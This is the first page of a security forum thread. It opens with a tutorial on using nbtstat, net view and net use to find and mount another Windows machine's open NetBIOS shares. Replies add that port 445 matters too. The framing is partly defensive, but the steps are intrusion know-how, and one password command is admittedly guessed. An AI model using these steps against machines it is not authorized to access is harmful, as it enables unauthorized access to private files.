net bios hacking
Page 1 of 8 123 ... LastLast
Results 1 to 10 of 77

Thread: net bios hacking

  1. #1
    Banned
    Join Date
    Sep 2001
    Posts
    853

    net bios hacking

    NetBIOS Tutorial by RiOtEr

    NetBIOS stands for Network basic input output system and is used in Windows for its file and printer sharing.

    1. NetBIOS

    To use NetBIOS remotely the computer has to have it running and unprotected first. To find if a computer has netBIOS boost up your favourite portscanner and look for netBIOS:

    25/tcp open smtp
    110/tcp open pop-3
    135/tcp open loc-srv
    139/tcp open netBIOS-ssn

    If your results look like that then you're set...

    2. nbtstat

    To get the info you need for the attack we use a program called nbtstat:

    Open up your console in WinXP, or a DOS-prompt in earlier windows-versions.

    Code:
    c:\>nbtstat -A 127.0.0.1
    Use -A if you're using IP addresses. If you're going to use hostnames use -a.

    This will give you what is called a nametable:

    Code:
    Local Area Connection 3:
    Node IpAddress: [xxx.xxx.xxx.xxx] Scope Id: []
    
               NetBIOS Remote Machine Name Table
    
           Name               Type         Status
        ---------------------------------------------
        computername      <00>  UNIQUE      Registered
        workgroupname     <00>  GROUP       Registered
        computername      <20>  UNIQUE      Registered
        workgroupname     <1E>  GROUP       Registered
        workgroupname     <1D>  UNIQUE      Registered
        ..__MSBROWSE__.   <01>  GROUP       Registered
    
        MAC Address = xx-xx-xx-xx-xx-xx
    This is a friend's nametable (names and workgroups have been edited to save him from elite_hax0rs)

    Now, the line
    Code:
    computername      <20>  UNIQUE      Registered
    is the interesting one as <20> means that filesharing is enabled: that means we can try to connect to that computer.
    First, we need to know their harddrive names etc, and we need to see if it's xp and if they have SharedDocs. To do this we use net view \\ipaddress

    Code:
    C:\>net view \\127.0.0.1
    Shared resources at \\xxx.xxx.xxx.xxx
    Share name  Type  Used as  Comment
    
    -----------------------------------
    SharedDocs  Disk
    The command completed successfully.
    That's the result you should get (it wil be different on a non-WinXP box ).

    Now comes the interesting part: we want to use and browse the person's harddrive just like it was locally. For doing that, we use a program called net use
    net use letter: \\ipaddress\name
    Code:
    c:\>net use g: \\127.0.0.1\SharedDocs
    The command completed successfully.
    c:\>net use h: \\127.0.0.1\C
    The command completed successfully.
    Now their harddrive is "mirrored" to the drive letter we specifided (so make sure its not a drive that exists on your computer). Now just browse it as you would a local drive:
    Code:
    c:\>cd g:
    g:\>
    In windows XP (not sure about other windows) you can open up "my computer": the drive you just added will be there for you to browse in all the GUI goodness.
    When you're done, make sure you remove the shared drive from your machine:
    Code:
    c:\>net use /delete g:
    g: was deleted successfully.
    Some systems may be locked with passwords (win2k, WinNT):
    If you know the password, you would use this command:
    Code:
    net use password \\ip\sharename
    (not sure about that one...)

    Now, many people will be saying "this is a security site, why are you telling us this?". The reason is simple: I'm showing you how easy it is for your windows machine to be hacked withough proper protection... Moral of this story: always cover port 139.

    RiOtEr

  2. #2
    Senior Member
    Join Date
    Oct 2001
    Posts
    677
    great post Rioter.
    One Ring to rule them all, One Ring to find them.
    One Ring to bring them all and in the darkness bind them.
    (The Lord Of The Rings)
    http://www.bytekill.net

  3. #3
    Banned
    Join Date
    Mar 2002
    Posts
    520
    Thank yah!

  4. #4
    Senior Member
    Join Date
    Nov 2001
    Location
    Ireland
    Posts
    735
    fl00t!

  5. #5
    Banned
    Join Date
    Mar 2002
    Posts
    594
    Good post, I learned something!

  6. #6
    Senior Member
    Join Date
    Sep 2001
    Posts
    1,027
    <quote>Moral of this story: always cover port 139.</quote>

    True, but Win2000 and WinXP also listen on port 445 for SMB service directly over TCP. port 139 is like "smb over netbios over tcp" (sortof)...

    Moral of this follow up: if you run w2k or wXP, always cover port 139 AND 445

    Ammo
    Credit travels up, blame travels down -- The Boss

  7. #7
    Banned
    Join Date
    Sep 2001
    Posts
    64
    So when you port scan a system and netbios services are open you can just use net to connect and rummange through their directories?

  8. #8
    Senior Member
    Join Date
    Sep 2001
    Posts
    1,027
    Sometimes...

    Depends if there are actually drives shared, and depends on if passwords are set.

    Ammo
    Credit travels up, blame travels down -- The Boss

  9. #9
    Senior Member
    Join Date
    Oct 2001
    Posts
    255
    very good, expect some green, amn best tut ive ever read.

    preep
    http://www.attrition.org/gallery/computing/forum/tn/youarenot.gif.html

  10. #10
    Senior Member
    Join Date
    May 2002
    Posts
    135
    um... ur all probably gunna tell me i have stupid questions but at least i might be safe if its answered, if u have a firewall doesnt it protect all ports?

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •